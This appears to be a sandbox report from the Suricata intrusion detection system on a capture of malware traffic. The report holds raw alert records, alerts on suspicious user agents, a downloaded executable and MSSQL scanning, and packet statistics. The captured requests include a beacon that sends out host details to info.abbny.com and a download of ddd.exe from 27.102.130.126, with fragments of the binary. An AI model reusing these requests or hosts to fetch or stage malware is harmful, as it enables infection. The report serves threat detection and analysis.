Filename: network.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 10.5597419739 seconds
Hash: cfcab331f081527fd30a5330ac5c8df5
Uploaded: 1561690507

Logfiles


unified2.alert.1561690515 - (12803 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
4\ê.ì·gÀ¨ðOb‘*ÁPÄ\ê.\ê.ì¨Eš)À¨ðOb‘*ÁPP_GET /raw HTTP/1.1
Accept-Encoding: identity
Host: ip.42.pl
Connection: close
User-Agent: Python-urllib/2.7

4\ê0&Õ·gÀ¨ð-OMÁPÃ\ê0\ê0&Õ§E™CÀ¨ð-OMÁPP±GET / HTTP/1.1
Accept-Encoding: identity
Host: jsonip.com
Connection: close
User-Agent: Python-urllib/2.7

4\ê0
­…·gÀ¨ð™\1ÁP~\ê0\ê0
­…bETk^À¨ð™\1ÁPPã{GET /e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

~\ê0\ê0
­…bETk^À¨ð™\1ÁPPã{GET /e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}ÍÀ¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}·gÀ¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}т
À¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1‹øΏ!f‚~À¨ðPÁ\ê1\ê1‹øêEÜff‚~À¨ðPÁPÃê€ÁAÿÖè"‹ð9>tVèâY„Àtÿ6è<_Yèà_‹8èÓ_‹ðè\PWÿ6è¤úÿÿƒÄ‹ðè„Àtk„Ûuèã^jjèJYYÇEüþÿÿÿ‹Æë5‹Mì‹‹‰EàQPèåSYYËeèèÉ„Àt2€}çuè“^ÇEüþÿÿÿ‹Eà‹Mðd‰
Y_^[ÉÃjèzVèØ^ÿuàè‚^Ìè¢étþÿÿU‹ìöEV‹ñÇ4@t
jVèGýÿÿYY‹Æ^]ÂU‹ìVÿu‹ñè…ûÿÿÇ<@‹Æ^]ƒa‹ÁƒaÇAD@Ç<@ÃU‹ìƒìMôè:ûÿÿh( AEôPèŒÌU‹ìƒìMôè½ÿÿÿh,¡AEôPèoÌéRU‹ìjÿŒÀAÿuÿˆÀAh	ÀÿÀAPÿ”ÀA]ÃU‹ìì$jè
…ÀtjYÍ)£±A‰
±A‰±A‰±A‰5±A‰=ü°AfŒ(±AfŒ
±AfŒø°AfŒô°AfŒ%ð°AfŒ-ì°Aœ ±A‹E£±A‹E£±AE£$±A‹…ÜüÿÿÇ`°A¡±A£°AÇ°A	ÀÇ°AÇ °AjXkÀǀ$°AjXkÀ‹
T@‰LøjXÁà‹
P@‰Løh\@èáþÿÿÉÃU‹ì¡T@ƒàj Y+ȋEÓÈ3T@]ÃU‹ì‹EV‹H<È·AQзAkð(ò;Öt‹M;Jr
‹BB;ÈrƒÂ(;Öuê3À^]ËÂëùVèG…Àt d¡¾0³A‹Pë;Ðt3À‹Êð±…Àuð2À^ð^ÃU‹ìƒ}uÆ4³Aèo覄Àu2À]ÃèŸb„Àu
jè·Yëé°]ÃU‹ìƒì€=5³At°ÉÃV‹u…ötƒþu}è½…Àt&…öu"h8³AèaY…ÀuhD³Aèõ`Y…ÀtF2ÀëK¡T@uôWƒà¿8³Aj Y+ȃÈÿÓÈ3T@‰Eô‰Eø‰Eü¥¥¥¿D³A‰Eô‰Eøuô‰Eü¥¥¥_Æ5³A°^ÉÃjè;Ìjhh¡Aè?ƒeü¸MZf9@u]¡<@¸@PEuL¹f9ˆ@u>‹E¹@+ÁPQè^þÿÿYY…Àt'ƒx$|!ÇEüþÿÿÿ°ë‹Eì‹3Ɂ8À”Á‹ÁËeèÇEüþÿÿÿ2À‹Mðd‰
Y_^[ÉÃU‹ìè¡…Àt€}u	3À¹0³A‡]ÃU‹ì€=4³At€}uÿuè/aÿuè8YY°]ÃU‹ì¡T@‹È38³AƒáÿuÓȃøÿuèh_ëh8³AèÌ_Y÷ØYÀ÷Ð#E]ÃU‹ìÿuèºÿÿÿ÷ØYÀ÷ØH]ÃU‹ìƒìƒeôEôƒeøPÿ¨ÀA‹Eø3Eô‰Eüÿ¤ÀA1Eüÿ ÀA1EüEìPÿœÀA‹EðMü3Eì3Eü3ÁÉË
T@VW¿Næ@»¾ÿÿ;Ït…Îu&è”ÿÿÿ‹È;Ïu¹Oæ@»ë…Îu

GÁàȉ
T@÷Ñ_‰
\ê1\ê1‹øêEÜff‚~À¨ðPÁPšÔP@^Ã3ÀÃ3À@ø@ÃhP³Aÿ¬ÀAðÃhhjè`ƒÄ…ÀuÃjè=ÌøX³AÃèÑôÿÿ‹Hƒ‰Hèçÿÿÿ‹Hƒ‰HÃ3À9\@”ÀøºAøºAÃU‹ìì$Sjès…Àt‹MÍ)jèŽÇ$̍…ÜüÿÿjP苃Ä‰…Œýÿÿ‰ˆýÿÿ‰•„ýÿÿ‰€ýÿÿ‰µ|ýÿÿ‰½xýÿÿfŒ•¤ýÿÿfŒ˜ýÿÿfŒtýÿÿfŒ…pýÿÿfŒ¥lýÿÿfŒ­hýÿÿœ…œýÿÿ‹E‰…”ýÿÿE‰… ýÿÿDžÜüÿÿ‹@üjP‰…ýÿÿE¨jPè‹EƒÄÇE¨@ÇE¬‰E´ÿ°ÀAjXÿ÷ۍE¨‰Eø…ÜüÿÿۉEüþÃÿŒÀAEøPÿˆÀA…Àu„Ûujè™Y[ÉÃéhþÿÿjÿ¸ÀA…Àt4¹MZf9u*‹H<ȁ9PEu¸f9Auƒytvƒ¹èt°Ã2ÀÃhý@ÿŒÀAÃU‹ì‹E‹8csmàu%ƒxu‹@= “t=!“t="“t
=@™t3À]Âèƒ^̃%`³AÃSV¾ðu@»ðu@;ósW‹>…ÿt
‹Ïÿ€ÁAÿ׃Æ;óré_^[ÃSV¾øu@»øu@;ósW‹>…ÿt
‹Ïÿ€ÁAÿ׃Æ;óré_^[ÃÌÌhà£@dÿ5‹D$‰l$l$+àSVW¡T@1Eü3ÅP‰eèÿuø‹EüÇEüþÿÿÿ‰EøEðd£òËMðd‰
Y__^[‹å]QòÃU‹ìƒ%d³Aƒì$S3ÛC	`@j
èú…À„lƒeð3Àƒ
`@3ÉVW‰d³A}ÜS¢‹ó[‰‰w‰O3ɉW‹E܋}à‰Eô÷Genu‹Eè5ineI‰Eø‹Eä5ntel‰Eü3À@S¢‹ó[]܉‹EüEøljs‰K‰SuC‹EÜ%ð?ÿ=Àt#=`t=pt=Pt=`t=pu‹=h³AƒÏ‰=h³Aë‹=h³Aƒ}ô‹Eä‰Eü|2jX3ÉS¢‹ó[]܉‹Eü‰s‰K‰S‹]à÷ÃtƒÏ‰=h³Aë‹]ð_^©tfƒ
`@Çd³A©tN©tG3ÉЉEì‰Uð‹Eì‹Mðƒàƒøu.¡`@ƒÈÇd³A£`@öà tƒÈ Çd³A£`@3À[ÉÃ3À9ºA•ÀÃU‹ìQQS‹]V‹uW‹‹H‹x‰Mø‹Ï‰Mü‹Ñ…öx<‹uøkÁƒÆƋuƒùÿtE‹]ƒèI9Xü‹]}
‹];‹]~ƒùÿu‹UüN‰Mü…öyÒA;×w;Êw‹E_^‰‰X‰H‰P[ÉÃè¡[ÌU‹ìƒì¡T@Mèƒeè3Á‹M‰Eð‹E‰Eô‹E@ÇEìܔ@‰Mø‰Eüd¡‰EèEèd£ÿuQÿuèA ‹È‹Eèd£‹ÁÉÃU‹ìƒì8S}#u¸-”@‹M‰3À@鶃eÈÇEÌv•@¡T@MÈ3Á‰EЋE‰EԋE‰EØ4\ê1‹øÖÔf‚~À¨ðPÁ\ê1\ê1‹øêEÜff‚~À¨ðPÁPÃê€ÁAÿÖè"‹ð9>tVèâY„Àtÿ6è<_Yèà_‹8èÓ_‹ðè\PWÿ6è¤úÿÿƒÄ‹ðè„Àtk„Ûuèã^jjèJYYÇEüþÿÿÿ‹Æë5‹Mì‹‹‰EàQPèåSYYËeèèÉ„Àt2€}çuè“^ÇEüþÿÿÿ‹Eà‹Mðd‰
Y_^[ÉÃjèzVèØ^ÿuàè‚^Ìè¢étþÿÿU‹ìöEV‹ñÇ4@t
jVèGýÿÿYY‹Æ^]ÂU‹ìVÿu‹ñè…ûÿÿÇ<@‹Æ^]ƒa‹ÁƒaÇAD@Ç<@ÃU‹ìƒìMôè:ûÿÿh( AEôPèŒÌU‹ìƒìMôè½ÿÿÿh,¡AEôPèoÌéRU‹ìjÿŒÀAÿuÿˆÀAh	ÀÿÀAPÿ”ÀA]ÃU‹ìì$jè
…ÀtjYÍ)£±A‰
±A‰±A‰±A‰5±A‰=ü°AfŒ(±AfŒ
±AfŒø°AfŒô°AfŒ%ð°AfŒ-ì°Aœ ±A‹E£±A‹E£±AE£$±A‹…ÜüÿÿÇ`°A¡±A£°AÇ°A	ÀÇ°AÇ °AjXkÀǀ$°AjXkÀ‹
T@‰LøjXÁà‹
P@‰Løh\@èáþÿÿÉÃU‹ì¡T@ƒàj Y+ȋEÓÈ3T@]ÃU‹ì‹EV‹H<È·AQзAkð(ò;Öt‹M;Jr
‹BB;ÈrƒÂ(;Öuê3À^]ËÂëùVèG…Àt d¡¾0³A‹Pë;Ðt3À‹Êð±…Àuð2À^ð^ÃU‹ìƒ}uÆ4³Aèo覄Àu2À]ÃèŸb„Àu
jè·Yëé°]ÃU‹ìƒì€=5³At°ÉÃV‹u…ötƒþu}è½…Àt&…öu"h8³AèaY…ÀuhD³Aèõ`Y…ÀtF2ÀëK¡T@uôWƒà¿8³Aj Y+ȃÈÿÓÈ3T@‰Eô‰Eø‰Eü¥¥¥¿D³A‰Eô‰Eøuô‰Eü¥¥¥_Æ5³A°^ÉÃjè;Ìjhh¡Aè?ƒeü¸MZf9@u]¡<@¸@PEuL¹f9ˆ@u>‹E¹@+ÁPQè^þÿÿYY…Àt'ƒx$|!ÇEüþÿÿÿ°ë‹Eì‹3Ɂ8À”Á‹ÁËeèÇEüþÿÿÿ2À‹Mðd‰
Y_^[ÉÃU‹ìè¡…Àt€}u	3À¹0³A‡]ÃU‹ì€=4³At€}uÿuè/aÿuè8YY°]ÃU‹ì¡T@‹È38³AƒáÿuÓȃøÿuèh_ëh8³AèÌ_Y÷ØYÀ÷Ð#E]ÃU‹ìÿuèºÿÿÿ÷ØYÀ÷ØH]ÃU‹ìƒìƒeôEôƒeøPÿ¨ÀA‹Eø3Eô‰Eüÿ¤ÀA1Eüÿ ÀA1EüEìPÿœÀA‹EðMü3Eì3Eü3ÁÉË
T@VW¿Næ@»¾ÿÿ;Ït…Îu&è”ÿÿÿ‹È;Ïu¹Oæ@»ë…Îu

GÁàȉ
T@÷Ñ_‰
\ê1\ê1‹øêEÜff‚~À¨ðPÁPšÔP@^Ã3ÀÃ3À@ø@ÃhP³Aÿ¬ÀAðÃhhjè`ƒÄ…ÀuÃjè=ÌøX³AÃèÑôÿÿ‹Hƒ‰Hèçÿÿÿ‹Hƒ‰HÃ3À9\@”ÀøºAøºAÃU‹ìì$Sjès…Àt‹MÍ)jèŽÇ$̍…ÜüÿÿjP苃Ä‰…Œýÿÿ‰ˆýÿÿ‰•„ýÿÿ‰€ýÿÿ‰µ|ýÿÿ‰½xýÿÿfŒ•¤ýÿÿfŒ˜ýÿÿfŒtýÿÿfŒ…pýÿÿfŒ¥lýÿÿfŒ­hýÿÿœ…œýÿÿ‹E‰…”ýÿÿE‰… ýÿÿDžÜüÿÿ‹@üjP‰…ýÿÿE¨jPè‹EƒÄÇE¨@ÇE¬‰E´ÿ°ÀAjXÿ÷ۍE¨‰Eø…ÜüÿÿۉEüþÃÿŒÀAEøPÿˆÀA…Àu„Ûujè™Y[ÉÃéhþÿÿjÿ¸ÀA…Àt4¹MZf9u*‹H<ȁ9PEu¸f9Auƒytvƒ¹èt°Ã2ÀÃhý@ÿŒÀAÃU‹ì‹E‹8csmàu%ƒxu‹@= “t=!“t="“t
=@™t3À]Âèƒ^̃%`³AÃSV¾ðu@»ðu@;ósW‹>…ÿt
‹Ïÿ€ÁAÿ׃Æ;óré_^[ÃSV¾øu@»øu@;ósW‹>…ÿt
‹Ïÿ€ÁAÿ׃Æ;óré_^[ÃÌÌhà£@dÿ5‹D$‰l$l$+àSVW¡T@1Eü3ÅP‰eèÿuø‹EüÇEüþÿÿÿ‰EøEðd£òËMðd‰
Y__^[‹å]QòÃU‹ìƒ%d³Aƒì$S3ÛC	`@j
èú…À„lƒeð3Àƒ
`@3ÉVW‰d³A}ÜS¢‹ó[‰‰w‰O3ɉW‹E܋}à‰Eô÷Genu‹Eè5ineI‰Eø‹Eä5ntel‰Eü3À@S¢‹ó[]܉‹EüEøljs‰K‰SuC‹EÜ%ð?ÿ=Àt#=`t=pt=Pt=`t=pu‹=h³AƒÏ‰=h³Aë‹=h³Aƒ}ô‹Eä‰Eü|2jX3ÉS¢‹ó[]܉‹Eü‰s‰K‰S‹]à÷ÃtƒÏ‰=h³Aë‹]ð_^©tfƒ
`@Çd³A©tN©tG3ÉЉEì‰Uð‹Eì‹Mðƒàƒøu.¡`@ƒÈÇd³A£`@öà tƒÈ Çd³A£`@3À[ÉÃ3À9ºA•ÀÃU‹ìQQS‹]V‹uW‹‹H‹x‰Mø‹Ï‰Mü‹Ñ…öx<‹uøkÁƒÆƋuƒùÿtE‹]ƒèI9Xü‹]}
‹];‹]~ƒùÿu‹UüN‰Mü…öyÒA;×w;Êw‹E_^‰‰X‰H‰P[ÉÃè¡[ÌU‹ìƒì¡T@Mèƒeè3Á‹M‰Eð‹E‰Eô‹E@ÇEìܔ@‰Mø‰Eüd¡‰EèEèd£ÿuQÿuèA ‹È‹Eèd£‹ÁÉÃU‹ìƒì8S}#u¸-”@‹M‰3À@鶃eÈÇEÌv•@¡T@MÈ3Á‰EЋE‰EԋE‰EØ4	\ê.‡B¯7À¨ðÀ¨Â™^	\ê.\ê.‡BB^
'šº}E4@€kBÀ¨ðÀ¨Â™˜Vjy€ -´4
\ê1	Õk¯7À¨ðÀ¨Â™^
\ê1\ê1	ÕkB^
'šº}E4 @€k@À¨ðÀ¨Â™i~—€ ¤å´4\ê1	ÖC¯7À¨ðÀ¨Â™^\ê1\ê1	ÖCB^
'šº}E4!@€k;À¨ðÀ¨Â™É ©.€ £¦´4\ê.ˆ¯7À¨ðÀ¨Â™^\ê.\ê.ˆB^
'šº}E4"@€k;À¨ðÀ¨Â™µüu˜€ ê`´4
\ê.ˆ%¯7À¨ðÀ¨Â™^
\ê.\ê.ˆ%B^
'šº}E4#@€k<À¨ðÀ¨Â™ôð>º€ âK´4\ê1
…RŠ¯À¨ðÀ¨4Â7™^\ê1\ê1
…RB^
'šº}E4F@€jèÀ¨ðÀ¨4Â7™é›
‚€ !Œ´4\ê2÷Âf‚~À¨ðPÁ\ê2\ê2÷êEÜff‚~À¨ðPÁP¯ameWKERNEL32.dllòSHGetSpecialFolderPathASHELL32.dllÁCryptAcquireContextWÛCryptReleaseContextÔCryptGetHashParamÃCryptCreateHashØCryptHashDataÆCryptDestroyHashADVAPI32.dll@StrRChrASHLWAPI.dll‚UnhandledExceptionFilterCSetUnhandledExceptionFilter	GetCurrentProcessaTerminateProcessmIsProcessorFeaturePresent-QueryPerformanceCounter
GetCurrentProcessIdGetCurrentThreadIdÖGetSystemTimeAsFileTimeKInitializeSListHeadgIsDebuggerPresent¾GetStartupInfoWgGetModuleHandleW­RtlUnwind@RaiseExceptionPGetLastErrorSetLastError!EncodePointer%EnterCriticalSection¢LeaveCriticalSectionDeleteCriticalSectionHInitializeCriticalSectionAndSpinCountsTlsAllocuTlsGetValuevTlsSetValuetTlsFreežFreeLibrary§LoadLibraryExWÀGetStdHandleÑMultiByteToWideCharÍWideCharToMultiByteQExitProcessfGetModuleHandleExWÈGetCommandLineAÉGetCommandLineW¤GetACP/HeapAlloc3HeapFree“CompareStringW–LCMapStringW>GetFileTypehFindClosemFindFirstFileExA}FindNextFileArIsValidCodePage†GetOEMCP³GetCPInfo'GetEnvironmentStringsWFreeEnvironmentStringsWíSetEnvironmentVariableA"SetStdHandleÅGetStringTypeW¢GetProcessHeap’FlushFileBuffersÜGetConsoleCPîGetConsoleMode8HeapSize6HeapReAllocýSetFilePointerExàWriteConsoleWÂCreateFileWþDecodePointer\ê2\ê2÷êEÜff‚~À¨ðPÁPòšЀ €@€dX€ep€ˆ€	 	°	Ààи"˜ó¸ÞPÒ&}ZIPMZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$»ÿޛÿž°Èÿž°Èÿž°ÈKAÈõž°ÈKCȂž°ÈKBÈ瞰ȭö´Éȭö³ÉힰȭöµÉҞ°È"a{Èúž°Èÿž±ÈŒž°Èn÷´Éýž°Èn÷µÉýž°Èn÷OÈþž°Èÿž'Èþž°Èn÷²Éþž°ÈRichÿž°ÈPEL é\à>Ò	+˜P@@“a@Pa<p0·	¸0À€b b@`L.data$<> à.bss 
P€À.idataŠ`
B@@.rsrc0·	p¸	L@@.relocÀ0@B4\êiñ<Š¯À¨ð>̍™^\êi\êiñ<B^
'šº}E4™@€4,À¨ð>̍™’ŒŠé€ žt´


suricata-4.0.0-etopen-all-alert-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (3352 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
03/29/2019-09:49:34.388290  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:36.272085  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49429 -> 45.79.77.20:80
03/29/2019-09:49:36.699781  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49430 -> 153.92.4.49:80
03/29/2019-09:49:37.163101  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.297976  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:37.297976  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:34.165698  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49687 -> 192.168.0.1:1433
03/29/2019-09:49:37.644459  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49688 -> 192.168.0.2:1433
03/29/2019-09:49:37.644675  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49689 -> 192.168.0.6:1433
03/29/2019-09:49:34.165907  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49690 -> 192.168.0.5:1433
03/29/2019-09:49:34.165925  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49691 -> 192.168.0.3:1433
03/29/2019-09:49:37.689490  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:49719 -> 192.168.0.52:1433
03/29/2019-09:49:38.528631  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:50:33.979260  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:52365 -> 8.8.8.62:1433


packet_stats.log - (17616 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             3       2236831542     2249120224    2240949128          6.7b    0.02
 IPv4       6         16826          6391458     2456743916    1885293390      31721.9b   99.89
 IPv4      17            51          1541152     2399959712     557661025         28.4b    0.09
 IPv6      17            17          1740684       48609844      19976409        339.6m    0.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             3            73941          89199         83432        250.3k    0.01
TMM_FLOWWORKER              IPv4       6         16826            66174       16344471        196548          3.3b   95.01
TMM_FLOWWORKER              IPv4      17            51           150199       13914019        798088         40.7m    1.17
TMM_RECEIVEPCAPFILE         IPv4       1             3             2891           3302          3042          9.1k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6         16825             2532        5754512          3332         56.1m    1.61
TMM_RECEIVEPCAPFILE         IPv4      17            51             2553          14132          3341        170.4k    0.00
TMM_DECODEPCAPFILE          IPv4       1             3             3120          12779          6900         20.7k    0.00
TMM_DECODEPCAPFILE          IPv4       6         16825             2648        9617146          4185         70.4m    2.02
TMM_DECODEPCAPFILE          IPv4      17            51             2683          36707          4016        204.8k    0.01
TMM_FLOWWORKER              IPv6      17            17           186502        2403388        345882          5.9m    0.17
TMM_RECEIVEPCAPFILE         IPv6      17            17             2857           3647          3239         55.1k    0.00
TMM_DECODEPCAPFILE          IPv6      17            17             2695          21224          4302         73.1k    0.00

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1             1             3435           3435          3435          3.4k  0.00  
flow                    IPv4       6         16825             2818         121273          4361         73.4m  2.41  
flow                    IPv4      17            51             2881          40073          5511        281.1k  0.01  
stream                  IPv4       6         16826             2571        2683559          4998         84.1m  2.76  
app-layer               IPv4      17            51             2536          35211         11027        562.4k  0.02  
detect                  IPv4       1             3            68361          83592         75576        226.7k  0.01  
detect                  IPv4       6         16826            44660       16305613        166500          2.8b  92.02 
detect                  IPv4      17            51           133963       13886539        536624         27.4m  0.90  
tcp-prune               IPv4       6         16826             2529         430655          3056         51.4m  1.69  
flow                    IPv6      17            17             2787           5935          3828         65.1k  0.00  
app-layer               IPv6      17            17             2538          10716          4113         69.9k  0.00  
detect                  IPv6      17            17           168181        2381438        325666          5.5m  0.18  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            11             4911          54345         17338        190.7k  54.25 
http                    IPv4      17             2             7052           7960          7506         15.0k  4.27  
tls                     IPv4       6             2             2926           6828          4877          9.8k  2.77  
dns                     IPv4      17            16             4855          21184          8505        136.1k  38.71 
Proto detect            IPv4       6             1            48489          48489         48489         48.5k
Proto detect            IPv4      17            24             5106          27721          8678        208.3k
Proto detect            IPv6      17             3             3122           4376          3886         11.7k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            13             9918          96419         48645        632.4k  3.72  
LOGGER_UNIFIED2             IPv4       6            13            17141         120251         50502        656.5k  3.86  
LOGGER_JSON_ALERT           IPv4       6            13            29295         167163         78317          1.0m  5.98  
LOGGER_JSON_DNS             IPv4      17            16            34423       10551907        730074         11.7m  68.63 
LOGGER_JSON_HTTP            IPv4       6            14            43172         243098         85853          1.2m  7.06  
LOGGER_JSON_TLS             IPv4       6             1            98484          98484         98484         98.5k  0.58  
LOGGER_JSON_FILE            IPv4       6            14            63118         250597        123792          1.7m  10.18 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             3             4141          13833          9828        29.5k  0.01  
payload                           IPv4       6          1832             2733         432728         24951        45.7m  13.83 
payload                           IPv4      17            51             4971         108651         34069         1.7m  0.53  
stream                            IPv4       6          1832             2541        7195911         40215        73.7m  22.29 
http_uri                          IPv4       6            14             5025          53604         16019       224.3k  0.07  
http_request_line                 IPv4       6            14             4211          10147          6382        89.3k  0.03  
http_client_body                  IPv4       6            14             3050          66122         21565       301.9k  0.09  
http_header (request)             IPv4       6            14            12007          71132         34724       486.1k  0.15  
http_header (request trailer)     IPv4       6            14             2631           3772          3011        42.2k  0.01  
http_header_names (request)       IPv4       6            14             6799          27884         16219       227.1k  0.07  
http_accept (request)             IPv4       6            14             2982           5557          4259        59.6k  0.02  
http_referer (request)            IPv4       6            14             2860           4324          3507        49.1k  0.01  
http_content_len (request)        IPv4       6            14             2882           6697          4065        56.9k  0.02  
http_content_type (request)       IPv4       6            14             2868          51201          7716       108.0k  0.03  
http_start (request)              IPv4       6            14             5345          12338          9000       126.0k  0.04  
http_raw_header (request)         IPv4       6            14             7596          14618         10014       140.2k  0.04  
http_method                       IPv4       6            14             2985          34007          6984        97.8k  0.03  
http_cookie (request)             IPv4       6            14             2851           4900          3696        51.8k  0.02  
http_raw_uri                      IPv4       6            14             2704           6240          4732        66.3k  0.02  
http_user_agent                   IPv4       6            14             2971          11801          5993        83.9k  0.03  
http_host                         IPv4       6            14             3413           9018          5279        73.9k  0.02  
dns_query                         IPv4      17             8             5518          11420          8591        68.7k  0.02  
tls_sni                           IPv4       6             1             3176           3176          3176         3.2k  0.00  
http_response_line                IPv4       6            14             3910           9999          7500       105.0k  0.03  
http_header (response)            IPv4       6            14            13575          61496         33263       465.7k  0.14  
http_header (response trailer)    IPv4       6            14             2618           3418          2956        41.4k  0.01  
http_content_type (response)      IPv4       6            14             3206           9276          4493        62.9k  0.02  
http_raw_header (response)        IPv4       6          1771             4058         156277          5087         9.0m  2.73  
http_cookie (response)            IPv4       6            14             2908          10604          4017        56.2k  0.02  
http_stat_code                    IPv4       6            14             3385           5741          4477        62.7k  0.02  
tls_cert_issuer                   IPv4       6             1             8684           8684          8684         8.7k  0.00  
